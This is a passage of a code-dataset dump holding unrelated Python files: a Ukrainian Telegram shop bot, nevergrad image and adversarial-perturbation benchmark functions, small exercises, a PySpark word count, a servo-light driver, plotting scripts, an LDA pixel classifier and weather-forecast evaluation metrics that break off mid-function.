request, abort\n\nfrom My_tg_bot.shop_models import *\nfrom My_tg_bot.utils import inline_kb_from_iterable\nfrom My_tg_bot.constants import *\nfrom My_tg_bot.extra_models import News_hot\nfrom My_tg_bot.config import TOKEN, URI\n\nbot = TeleBot(TOKEN)\napp = Flask(__name__)\n\n\n@app.route(URI, methods=['POST'])\ndef handle_webhook():\n if request.headers.get('content-type') == 'application/json':\n json_string = request.get_data().decode('utf-8')\n update = Update.de_json(json_string)\n bot.process_new_updates([update])\n return ''\n abort(403)\n\n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n try:\n User.objects.create(\n telegram_id=message.chat.id,\n username=getattr(message.from_user, 'username', None),\n first_name=getattr(message.from_user, 'first_name', None)\n )\n except NotUniqueError:\n greetings = GREETINGS_1\n else:\n name = f', {message.from_user.first_name}' if getattr(message.from_user, 'first_name') else ''\n greetings = GREETINGS.format(name)\n kb = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in START_KB.values()]\n kb.add(*buttons)\n bot.send_message(message.chat.id, greetings, reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: START_KB[CATEGORIES] == m.text)\ndef handle_categories(message):\n root_categories = Category.get_root_categories()\n kb = inline_kb_from_iterable(CATEGORY_TAG, root_categories)\n bot.send_message(message.chat.id, CHOOSE_CATEGORY, reply_markup=kb)\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == CATEGORY_TAG)\ndef handle_category_click(call):\n category = Category.objects.get(id=json.loads(call.data)['id'])\n if category.subcategories:\n kb = inline_kb_from_iterable(CATEGORY_TAG, category.subcategories)\n bot.edit_message_text(category.title, chat_id=call.message.chat.id, message_id=call.message.id,\n reply_markup=kb)\n else:\n products = category.get_products()\n for p in products:\n kb = InlineKeyboardMarkup()\n 
button = InlineKeyboardButton(text=ADD_TO_CART, callback_data=json.dumps({\n 'id': str(p.id),\n 'tag': PRODUCT_TAG\n }))\n kb.add(button)\n description = p.description if p.description else ''\n bot.send_photo(call.message.chat.id, p.image.read(),\n caption=f'{p.title}\\n{description}\\nЦіна на даний товар - {p.price} грн'\n f'\\nЦіна на товар враховуючи знижку - {p.real_discount()} грн', reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: START_KB[PRODUCTS_WITH_DISCOUNT] == m.text)\ndef discounts(message):\n products = Product.objects(discount__ne=0)\n bot.send_message(message.chat.id, PRODUCTS_DIS)\n for i in products:\n bot.send_message(message.chat.id, f'{i.title} - {i.discount}%\\n')\n\n\n@bot.message_handler(func=lambda m: START_KB[NEWS] == m.text)\ndef handle_categories(message):\n count_news = News_hot.objects().count()\n your_news = News_hot.objects[count_news-3:count_news]\n bot.send_message(message.chat.id, HOT_NEWS)\n for n in your_news:\n bot.send_message(message.chat.id, f\"{n.body}\")\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == PRODUCT_TAG)\ndef handle_category_click(call):\n product = Product.objects.get(id=json.loads(call.data)['id'])\n try:\n Cart.objects.create(user_telegram_id=call.from_user.id)\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n cart.add_product(product)\n except NotUniqueError:\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n cart.add_product(product)\n bot.send_message(call.message.chat.id, f'Товар - {product.title}, було додано в корзину')\n\n\n@bot.message_handler(func=lambda m: START_KB[CART] == m.text)\ndef your_settings(message):\n try:\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n list_1 = []\n if cart.products == list_1:\n bot.send_message(message.chat.id, SORRY_CART)\n else:\n bot.send_message(message.chat.id, CART_PRODUCT)\n kb_1 = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in CART_KB.values()]\n kb_1.add(*buttons)\n for i in cart.products:\n kb = InlineKeyboardMarkup()\n button = InlineKeyboardButton(text='Видалити з корзини', callback_data=json.dumps({\n 'id': str(i.id),\n 'tag': CART_TAG\n }))\n kb.add(button)\n bot.send_message(message.chat.id, i.title, reply_markup=kb)\n bot.send_message(message.chat.id, THANKS, reply_markup=kb_1)\n except DoesNotExist:\n bot.send_message(message.chat.id, SORRY_CART)\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == CART_TAG)\ndef deletion_cart(call):\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n product = Product.objects.get(id=json.loads(call.data)['id'])\n list_1 = []\n for i in cart.products:\n list_1.append(i)\n index_1 = cart.products.index(product)\n del list_1[index_1]\n cart.update(products=list_1)\n bot.send_message(call.message.chat.id, f'Товар - {product.title} було видалено з корзини')\n\n\n@bot.message_handler(func=lambda m: START_KB[SETTINGS] == m.text)\ndef your_settings(message):\n user = User.objects.get(telegram_id=message.chat.id)\n data = user.formatted_data()\n kb = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in SETTINGS_KB.values()]\n kb.add(*buttons)\n bot.send_message(message.chat.id, PARAMETERS.format(data), reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NICK] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_NICK)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NAME] == m.text)\ndef nick_change(message):\n 
bot.send_message(message.chat.id, YOUR_NAME)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[EMAIL] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_EMAIL)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NUMBER] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_NUM)\n\n\n@bot.message_handler(content_types=['text'])\ndef understanding(message):\n if 'Новий нікнейм:' in message.text:\n new_nick = message.text[14::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(username=new_nick)\n bot.send_message(message.chat.id, f'{new_nick} - Ваш новий нікнейм, його було збережено')\n elif 'Новий нейм:' in message.text:\n new_name = message.text[11::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(first_name=new_name)\n bot.send_message(message.chat.id, f\"{new_name} - Ваше нове ім'я, його було збережено\")\n elif 'Новий емейл:' in message.text:\n new_email = message.text[12::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(email=new_email)\n bot.send_message(message.chat.id, f\"{new_email} - Ваш новий емейл, його було збережено\")\n elif 'Новий номер:' in message.text:\n new_number = message.text[12::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(phone_number=new_number)\n bot.send_message(message.chat.id, f\"{new_number} - Ваш новий номер телефону, його було збережено\")\n elif 'Сума всіх товарів корзини' == message.text:\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n list_1 = []\n c = 1\n for i in cart.products:\n bot.send_message(message.chat.id, f'Ціна {c} обраного товару - {i.real_discount()} грн\\n ')\n list_1.append(i.real_discount())\n c += 1\n bot.send_message(message.chat.id, f'Всього маємо: {sum(list_1)} грн')\n elif 'Оформити замовлення' == message.text:\n bot.send_message(message.chat.id, NUM_ORDER)\n elif 'Мій номер:' in message.text:\n new_number = message.text[9::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(phone_number=new_number)\n bot.send_message(message.chat.id, ADDRESS_ORDER)\n elif 'Моя адреса:' in message.text:\n new_address = message.text[11::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.address = new_address\n user.save()\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n order1 = Order.objects.create(user_telegram_id_1=cart.user_telegram_id, phone_number=user.phone_number,\n address=user.address)\n list_1 = []\n for i in cart.products:\n list_1.append(i.real_discount())\n order1.products_1.append(i.title)\n order1.save()\n user = User.objects.get(telegram_id=message.from_user.id)\n bot.send_message(message.chat.id, f'Ваш чек:\\n№ - {user.telegram_id}\\nОтримувач - {user.first_name}\\n'\n f'Список товарів - {order1.products_1}\\n'\n f'Номер телефону отримувача - {order1.phone_number}\\n'\n f'Адреса отримувача - {order1.address}\\n'\n f'До сплати - {sum(list_1)} грн\\n(。◕‿◕。)')\n bot.send_message(message.chat.id, THANKS_FOR_BUYING)\n else:\n bot.send_message(message.chat.id, CANT_UNDERSTAND)\n\n\n\n\n\n\n","sub_path":"My_tg_bot/shop_bot.py","file_name":"shop_bot.py","file_ext":"py","file_size_in_byte":10359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44066381","text":"# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom pathlib import Path\n\nimport numpy as np\nimport PIL.Image\nimport torch.nn as nn\nimport torch\n\nimport nevergrad as ng\nfrom .. import base\n\n\nclass Image(base.ExperimentFunction):\n def __init__(self, problem_name: str = \"recovering\", index: int = 0) -> None:\n \"\"\"\n problem_name: the type of problem we are working on.\n recovering: we directly try to recover the target image.\n index: the index of the problem, inside the problem type.\n For example, if problem_name is \"recovering\" and index == 0,\n we try to recover the face of O. Teytaud.\n \"\"\"\n\n # Storing high level information.\n self.domain_shape = (256, 256, 3)\n self.problem_name = problem_name\n self.index = index\n\n # Storing data necessary for the problem at hand.\n assert problem_name == \"recovering\" # For the moment we have only this one.\n assert index == 0 # For the moment only 1 target.\n # path = os.path.dirname(__file__) + \"/headrgb_olivier.png\"\n path = Path(__file__).with_name(\"headrgb_olivier.png\")\n image = PIL.Image.open(path).resize((self.domain_shape[0], self.domain_shape[1]), PIL.Image.ANTIALIAS)\n self.data = np.asarray(image)[:, :, :3] # 4th Channel is pointless here, only 255.\n # parametrization\n array = ng.p.Array(init=128 * np.ones(self.domain_shape), mutable_sigma=True)\n array.set_mutation(sigma=35)\n array.set_bounds(lower=0, upper=255.99, method=\"clipping\", full_range_sampling=True)\n max_size = ng.p.Scalar(lower=1, upper=200).set_integer_casting()\n array.set_recombination(ng.p.mutation.Crossover(axis=(0, 1), max_size=max_size)).set_name(\"\") # type: ignore\n\n super().__init__(self._loss, array)\n self.register_initialization(problem_name=problem_name, index=index)\n self._descriptors.update(problem_name=problem_name, index=index)\n\n def _loss(self, x: np.ndarray) -> float:\n assert self.problem_name == \"recovering\"\n x = np.array(x, copy=False).ravel()\n x = x.reshape(self.domain_shape)\n assert x.shape == self.domain_shape, f\"Shape = {x.shape} vs {self.domain_shape}\"\n # Define the loss, in case of recovering: the goal is to find the target image.\n assert self.index == 0\n value = float(np.sum(np.fabs(np.subtract(x, self.data))))\n return value\n\n\nclass TestClassifier(nn.Module):\n def __init__(self, image_size: int = 224):\n super().__init__()\n self.model = nn.Linear(image_size * image_size * 3, 10)\n\n def forward(self, x):\n return self.model(x.view(x.shape[0], -1))\n\n\n# pylint: disable=too-many-arguments\nclass ImageAdversarial(base.ExperimentFunction):\n\n def __init__(self, classifier: nn.Module, image: torch.Tensor, label: int = 0, targeted: bool = False,\n epsilon: float = 0.05) -> None:\n # TODO add crossover params in args + criterion\n \"\"\"\n params : needs to be detailed\n \"\"\"\n self.targeted = targeted\n self.epsilon = epsilon\n self.image = image # if (image is not None) else torch.rand((3, 224, 224))\n self.label = torch.Tensor([label]) # if (label is not None) else torch.Tensor([0])\n self.label = self.label.long()\n self.classifier = classifier # if (classifier is not None) else Classifier()\n self.criterion = nn.CrossEntropyLoss()\n self.imsize = self.image.shape[1]\n\n array = ng.p.Array(init=np.zeros(self.image.shape), mutable_sigma=True, ).set_name(\"\")\n array.set_mutation(sigma=self.epsilon / 10)\n array.set_bounds(lower=-self.epsilon, upper=self.epsilon, method=\"clipping\", 
full_range_sampling=True)\n max_size = ng.p.Scalar(lower=1, upper=200).set_integer_casting()\n array.set_recombination(ng.p.mutation.Crossover(axis=(1, 2), max_size=max_size)) # type: ignore\n\n super().__init__(self._loss, array)\n self.register_initialization(classifier=classifier, image=image, label=label,\n targeted=targeted, epsilon=epsilon)\n # classifier and image cant be set as descriptors\n self.add_descriptors(label=label, targeted=targeted, epsilon=epsilon)\n\n @classmethod\n def from_testbed(\n cls,\n name: str,\n label: int = 0,\n targeted: bool = False,\n epsilon: float = 0.05\n ) -> \"ImageAdversarial\":\n if name == \"test\":\n imsize = 224\n classifier = TestClassifier(imsize)\n image = torch.rand((3, imsize, imsize))\n else:\n raise ValueError(f'Testbed \"{name}\" is not implemented, check implementation in {__file__}')\n func = cls(classifier=classifier, image=image, label=label, targeted=targeted, epsilon=epsilon)\n # clean up and update decsriptors\n assert func._initialization_kwargs is not None\n for d in [\"classifier\", \"image\"]:\n del func._initialization_kwargs[d]\n func._initialization_kwargs[\"name\"] = name\n func._initialization_func = cls.from_testbed # type: ignore\n func._descriptors.update(name=name)\n return func\n\n def _loss(self, x: np.ndarray) -> float:\n x = torch.Tensor(x)\n image_adv = torch.clamp(self.image + x, 0, 1)\n image_adv = image_adv.view(1, 3, self.imsize, self.imsize)\n output_adv = self.classifier(image_adv)\n if self.targeted:\n value = self.criterion(output_adv, self.label)\n else:\n value = -self.criterion(output_adv, self.label)\n return float(value.item())\n","sub_path":"nevergrad/functions/images/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522076118","text":"# ASIF BUX\n\nimport string\n\n\"\"\"Character frequency\"\"\"\n\n'''Total number of characters'''\n\n\ndef process_file(filename):\n hist = {}\n file = open(filename)\n word = file.readlines()\n print(type(word))\n # for i in file:\n # wordList = []\n # wordList.append(i.strip())\n return wordList\n\n # for word in file:\n # # putting all the characters\n # for i in file:\n #\n # # update the histogram\n # hist[word] = hist.get(word, 0) + 1\n # return hist\n\nallCharacters = process_file('words.txt')\nprint(allCharacters)\n#\n# '''The ten most common characters'''\n#\n#\n# def most_common(hist):\n# t = []\n# for key, value in hist.items():\n# t.append((value, key))\n# t.sort()\n# t.reverse()\n# for freq, word in t[:10]:\n# print(word, ':', freq)\n# return t\n#\n#\n# print(most_common(allCharacters))\n#\n# '''The ten least common characters'''\n#\n#\n# def least_common(hist):\n# t = []\n# for key, value in hist.items():\n# t.append((value, key))\n# t.sort()\n# for freq, word in t[:10]:\n# print(word, ':', freq)\n# return t\n#\n#\n# print(least_common(allCharacters))\n","sub_path":"Assignment3/A03_1_char_frequency.py","file_name":"A03_1_char_frequency.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"342249274","text":"# Crear y cargar una lista con 5 enteros por teclado. 
Implementar un algoritmo que identifique el menor valor de la lista y la posición donde se encuentra.\n\n\nlista=[]\nfor x in range(5):\n valor=int(input(\"Ingrese valor: \"))\n lista.append(valor) \n\nmenor=lista[0]\nposicion=0\nfor x in range(1,5):\n if lista[x]<menor:\n menor=lista[x]\n posicion=x+1\n\nprint(f\"Lista completa: {lista}\")\nprint(f\"Menor de la lista: {menor}\")\nprint(f\"Posicion del menor en la lista: {posicion}\")","sub_path":"Ejercicios Listas/Listas8.py","file_name":"Listas8.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"207498014","text":"# This is adapted from Apache Software Foundation's count words example\n# included with Spark software. See http://www.apache.org/licenses/LICENSE-2.0 for\n# more info\n\n# This program takes an input file \"sample.txt\" and outputs a count of\n# words within the file\n\n# Access the SparkSession module from pyspark\nfrom pyspark.sql import SparkSession\n\n# Open a Spark session\nspark = SparkSession.builder.appName(\"count_words\").getOrCreate()\n \n# Read in the data file as rows\nlines = spark.read.text(\"test_data/sample.txt\").rdd.map(lambda r: r[0])\n\n# There are three transformations performed on the data to count the words\n# First transformation: FlatMap returns a dataset consisting of strings read from each row everytime a space is encountered\n# Second transformation: Map returns a dataset of words (as opposed to rows)\n# Third transformation: reduceByKey returns a dataset of unique keys (words)\n# and count of their occurrence\nword_count = lines.flatMap(lambda line: line.split(\" \"))\\\n .map(lambda word: (word, 1)) \\\n .reduceByKey(lambda a, b: a + b)\n \n# This performs the collect action, returning elements of the dataset created above\noutput = word_count.collect()\n\n# This prints out the results\nfor(word, count) in output: \n print(\"%s: %i\" % (word, count))\n \nspark.stop()","sub_path":"src/count_words.py","file_name":"count_words.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"540894488","text":"LIGHT_MAX = 1600\nLIGHT_MIN = 400\nLIGHT_INC = 200\n\nclass Light:\n \"\"\"Brightness incrementation doesn't work. Our light does not have this feature??? 
\"\"\"\n def __init__(self, pwm, pin):\n self.pwm = pwm\n self.pin = pin\n self.brightness = 800\n self.on = 0\n\n def inc_brightness(self):\n self.brightness += LIGHT_INC\n if self.brightness > LIGHT_MAX:\n self.brightness = LIGHT_MAX\n\n def dec_brightness(self):\n self.brightness -= LIGHT_INC\n if self.brightness < LIGHT_MIN:\n self.brightness = LIGHT_MIN\n\n def toggle(self):\n if not self.on:\n self.pwm.set_pwm(self.pin, 0, self.brightness)\n self.on = 1\n else:\n self.pwm.set_pwm(self.pin, 0, 0)\n self.on = 0\n\n def set_on(self):\n self.pwm.set_pwm(self.pin, 0, self.brightness)\n\n def set_off(self):\n self.pwm.set_pwm(self.pin, 0, 0)\n\nif __name__ == \"__main__\":\n import time\n import Adafruit_PCA9685\n\n PWM_FREQ = 48\n LIGHT_PIN = 15\n\n pwm = Adafruit_PCA9685.PCA9685()\n pwm.set_pwm_freq(PWM_FREQ) # 50 Hz is good for servo\n\n light = Light(pwm, LIGHT_PIN)\n light.set_on()\n time.sleep(1)\n light.set_off()\n time.sleep(3)\n\n","sub_path":"devices/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546754149","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport math\n\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom read_sim_data import *\n\ncolors = { 1:'b', 2:'r', 3:'y'}\ndef get_limits2D(time_intervals, idx):\n maxX = maxY = float(\"-inf\")\n minX = minY = float(\"inf\")\n for i in range(len(time_intervals)):\n x,y,c = get_plot_data2D(i, time_intervals, idx)\n maxX = max(max(x), maxX)\n maxY = max(max(y), maxY)\n minX = min(min(x), minX)\n minY = min(min(y), minY)\n return [(minX, maxX), (minY, maxY)]\n\ndef get_plot_data2D(i, time_intervals, idx):\n t = time_intervals[i]\n velocity_vecs = [n.vectors[idx] for n in t.nodes]\n x = [v.x for v in velocity_vecs]\n y = [v.y for v in velocity_vecs]\n c = [colors[n.group] for n in t.nodes]\n return (x, y, c)\n\ndef plot(time_intervals, idx):\n def update_plot(i, time_intervals, q):\n x, y, c = get_plot_data2D(i, time_intervals, ORIGINAL_POS)\n u, v, c = get_plot_data2D(i, time_intervals, idx)\n xy = np.array(zip(x,y))\n q.set_offsets(xy)\n q.set_UVC(u, v)\n return q,\n\n x, y, c = get_plot_data2D(0, time_intervals, ORIGINAL_POS)\n u, v, _ = get_plot_data2D(0, time_intervals, idx)\n\n fig = plt.figure()\n q = plt.quiver(x, y, u, v, color = c, pivot='tail',\n linewidths=(0.5,), edgecolors=('k'), headaxislength=2)\n\n xlim, ylim = get_limits2D(time_intervals, ORIGINAL_POS)\n plt.xlim(xlim)\n plt.ylim(ylim)\n\n anim = animation.FuncAnimation(fig, update_plot, frames=len(time_intervals),\n fargs=(time_intervals, q), interval=100)\n\n #anim.save('vec_fields.mov', fps=5, extra_args=['-vcodec', 'libx264'], dpi = 170)\n plt.show()\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n print(argv[1])\n plot(read_file(argv[1]), int(argv[2]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scenarios/scripts/old_scripts/vector_field.py","file_name":"vector_field.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13715840","text":"import logging\nfrom typing import cast\nfrom app.Exceptions.APIException import APIException\nfrom database.DBConnection import AlchemyEncoder, get_session\nfrom utils.http_utils import build_response, get_paginate_params\nfrom app.Data.Enum.http_status_code import 
HTTPStatusCode\nfrom app.Data.Interfaces.PaginationResult import PaginationResult\nfrom app.Services.QuestionService import QuestionService\nfrom app.Core.Controllers.BaseController import index, find, store, update, delete\n\ndef get_by_quiz(service, event: dict):\n session = get_session()\n (page, per_page) = get_paginate_params(event['queryStringParameters'])\n path_params = event['pathParameters']\n quizId = int(path_params['quizId'])\n \n try:\n elements = cast(QuestionService, service).filter_by_column(session, \"IdQuiz\", quizId, True)\n total_elements = cast(QuestionService, service).count_elements(session)\n body = PaginationResult(elements, page, per_page, total_elements).to_dict()\n status_code = HTTPStatusCode.OK.value\n except APIException as e:\n logging.exception(\"APIException occurred\")\n body = e.to_dict()\n status_code = e.status_code\n except Exception as e:\n logging.exception(\"Cannot make the request\")\n body = dict(message=\"Cannot make the request\")\n status_code = HTTPStatusCode.UNPROCESABLE_ENTITY.value\n finally:\n session.close()\n return build_response(status_code, body, jsonEncoder=AlchemyEncoder)","sub_path":"code/evaluation-system-be/app/Controllers/QuestionController.py","file_name":"QuestionController.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239674057","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 24 11:05:43 2017\n\n@author: heikki.huttunen@tut.fi\n\nAn example of using the LDA for pixel color classification.\nLeft mouse button shows examples of foreground, and\nright mouse button examples of background.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef onclick(event):\n \"\"\"\n Function that is run every time when used clicks the mouse.\n \"\"\"\n \n ix, iy = event.xdata, event.ydata\n button = event.button\n \n if button == 2:\n # Stop when used clicks middle button (or kills window)\n fig.canvas.mpl_disconnect(cid)\n plt.close(\"all\")\n else:\n # Otherwise add to the coords list.\n global coords\n coords.append([int(ix), int(iy), button])\n\nif __name__ == \"__main__\":\n \n # Load test image and show it.\n \n img = plt.imread(\"hh.jpg\")\n \n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.imshow(img)\n ax.set_title(\"Left-click: face; right-click: non-face; middle: exit\")\n coords = []\n \n # Link mouse click to our function above.\n \n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show()\n \n X = []\n y = []\n \n for ix, iy, button in coords:\n \n # Collect nearby samples to the user clicked point\n \n w = img[iy-3 : iy+4, ix-3:ix+4, :]\n \n # Unnecessarily complicated line to collect color channels\n # into a matrix (results in 49x3 matrix)\n \n C = np.array([w[...,c].ravel() for c in [0,1,2]]).T\n X.append(C)\n \n # Store class information to y.\n \n if button == 1:\n y.append(np.ones(C.shape[0]))\n else:\n y.append(np.zeros(C.shape[0]))\n \n X = np.concatenate(X, axis = 0)\n y = np.concatenate(y, axis = 0)\n X_test = np.array([img[...,c].ravel() for c in [0,1,2]]).T\n \n # Switch between sklearn and our own implementation.\n # Don't know why these produce slightly different results.\n # Both seem to work though.\n \n use_sklearn = True\n \n if use_sklearn:\n clf = LinearDiscriminantAnalysis()\n clf.fit(X, y)\n y_hat = clf.predict(X_test)\n \n else: # Do it the hard 
way:\n        C0 = np.cov(X[y==0, :], rowvar = False)\n        C1 = np.cov(X[y==1, :], rowvar = False)\n        m0 = np.mean(X[y==0, :], axis = 0)\n        m1 = np.mean(X[y==1, :], axis = 0)\n        \n        w = np.dot(np.linalg.inv(C0 + C1), (m1 - m0))\n        T = 0.5 * (np.dot(w, m1) + np.dot(w, m0)) \n        \n        y_hat = np.dot(X_test, w) - T\n\n    # Now y_hat is the class score.\n    # Let's just threshold that at 0.\n    # And cast from bool to integer\n    \n    y_hat = (y_hat > 0).astype(np.uint8)\n    \n    # Manipulate the vector form prediction to the original image shape.\n    \n    class_img = np.reshape(y_hat, img.shape[:2])\n    \n    fig, ax = plt.subplots(1, 3)\n    ax[0].imshow(img)\n    if use_sklearn:\n        # predict_proba exists only on the fitted sklearn classifier;\n        # the manual LDA branch has no clf object.\n        prob_img = np.reshape(clf.predict_proba(X_test)[:, 1], img.shape[:2])\n        ax[1].imshow(prob_img)\n    img[class_img == 0] = 0\n    ax[2].imshow(img)\n\n    # Show the data in a 3D plot.\n    \n    fig2 = plt.figure()\n    ax = fig2.add_subplot(111, projection='3d')\n    ax.plot(X[y==0, 0], X[y==0, 1], X[y==0, 2], 'ro')\n    ax.plot(X[y==1, 0], X[y==1, 1], X[y==1, 2], 'bo')\n    ax.plot(X_test[y_hat==0, 0], X_test[y_hat==0, 1], X_test[y_hat==0, 2], 'r.', alpha = 0.4)\n    ax.plot(X_test[y_hat==1, 0], X_test[y_hat==1, 1], X_test[y_hat==1, 2], 'b.', alpha = 0.4)\n    \n    plt.show()\n    ","sub_path":"code/mouse_click_LDA.py","file_name":"mouse_click_LDA.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"631859991","text":"\"\"\"\nFunctions for evaluating forecasts.\n\"\"\"\nimport numpy as np\nimport xarray as xr\n#import properscoring as ps\nimport xskillscore as xs\nimport tqdm\nfrom tqdm import tqdm\n\ndef load_test_data(path, var, years=slice('2017', '2018'), cmip=False):\n    \"\"\"\n    Args:\n        path: Path to nc files\n        var: variable. Geopotential = 'z', Temperature = 't'\n        years: slice for time window\n    Returns:\n        dataset: Concatenated dataset for 2017 and 2018\n    \"\"\"\n    assert var in ['z', 't'], 'Test data only for Z500 and T850'\n    ds = xr.open_mfdataset(f'{path}/*.nc', combine='by_coords')[var]\n    if cmip:\n        ds['plev'] /= 100\n        ds = ds.rename({'plev': 'level'})\n    try:\n        ds = ds.sel(level=500 if var == 'z' else 850).drop('level')\n    except ValueError:\n        pass\n    return ds.sel(time=years)\n\ndef compute_weighted_rmse(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n    \"\"\"\n    Compute the RMSE with latitude weighting from two xr.DataArrays.\n    Args:\n        da_fc (xr.DataArray): Forecast. 
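Must be on the same lat/lon grid as the truth. 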
Time coordinate must be validation time.\n        da_true (xr.DataArray): Truth.\n    Returns:\n        rmse: Latitude weighted root mean squared error\n    \"\"\"\n    error = da_fc - da_true\n    weights_lat = np.cos(np.deg2rad(error.lat))\n    weights_lat /= weights_lat.mean()\n    rmse = np.sqrt(((error)**2 * weights_lat).mean(mean_dims))\n    return rmse\n\n\ndef evaluate_iterative_forecast(da_fc, da_valid, func, mean_dims=xr.ALL_DIMS):\n    rmses = []\n    for f in da_fc.lead_time:\n        fc = da_fc.sel(lead_time=f)\n        fc['time'] = fc.time + np.timedelta64(int(f), 'h')\n        rmses.append(func(fc, da_valid, mean_dims))\n    return xr.concat(rmses, 'lead_time')\n\n\ndef compute_weighted_acc(da_fc, da_true, centered=True):\n    clim = da_true.mean('time')\n    t = np.intersect1d(da_fc.time, da_true.time)\n    fa = da_fc.sel(time=t) - clim\n    a = da_true.sel(time=t) - clim\n    \n    weights_lat = np.cos(np.deg2rad(da_fc.lat))\n    weights_lat /= weights_lat.mean()\n    w = weights_lat\n    \n    if centered:\n        fa_prime = fa - fa.mean()\n        a_prime = a - a.mean()\n    else:\n        fa_prime = fa\n        a_prime = a\n    \n    acc = (\n        np.sum(w * fa_prime * a_prime) /\n        np.sqrt(\n            np.sum(w * fa_prime**2) * np.sum(w * a_prime**2)\n        )\n    )\n    return acc\n\n\ndef compute_weighted_meanspread(da_fc, mean_dims=xr.ALL_DIMS):\n    \"\"\"\n    prediction: xarray. Coordinates: time, forecast_number, lat, lon. Variables: z500, t850\n    time: Let there be I initial conditions\n    forecast_number: For each initial condition, let there be N forecasts\n    #mean variance\n    #1. for each input i, for each gridpoint, find variance among all N forecasts for that single input i\n    #2. for each input i, find latitude-weighted average of all the lat*lon points\n    #3. find average of all I inputs. take square root\n    \"\"\"\n    var1 = da_fc.var('member')\n    weights_lat = np.cos(np.deg2rad(var1.lat))\n    weights_lat /= weights_lat.mean()\n    mean_spread = np.sqrt((var1*weights_lat).mean(mean_dims))\n    \n    return mean_spread\n\n\ndef compute_weighted_crps(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n    da_true = da_true.sel(time=da_fc.time)\n    assert (da_true.time == da_fc.time).all()  # check that the time coordinates align\n    \n    weights_lat = np.cos(np.deg2rad(da_fc.lat))\n    weights_lat /= weights_lat.mean()\n    crps = xs.crps_ensemble(da_true, da_fc)\n    crps = (crps * weights_lat).mean(mean_dims)\n    return crps\n# def crps_score(da_fc,da_true,member_axis,mean_dims=xr.ALL_DIMS): \n#     #check size\n#     da_true=da_true.sel(time=da_fc.time)\n#     assert (da_true.time==da_fc.time).all()\n    \n#     #import properscoring as ps\n#     obs = np.asarray(da_true.to_array(), dtype=np.float32).squeeze();\n#     #shape: (variable,time, lat, lon)\n#     pred=np.asarray(da_fc.to_array(), dtype=np.float32).squeeze();\n#     #shape: (variable, member, time, lat, lon)\n#     member_axis=member_axis+1 #Weird but have to do since the above line changes position of member_axis\n#     if pred.ndim==4: #for single ensemble member. 
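(np.expand_dims adds the missing member axis) 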
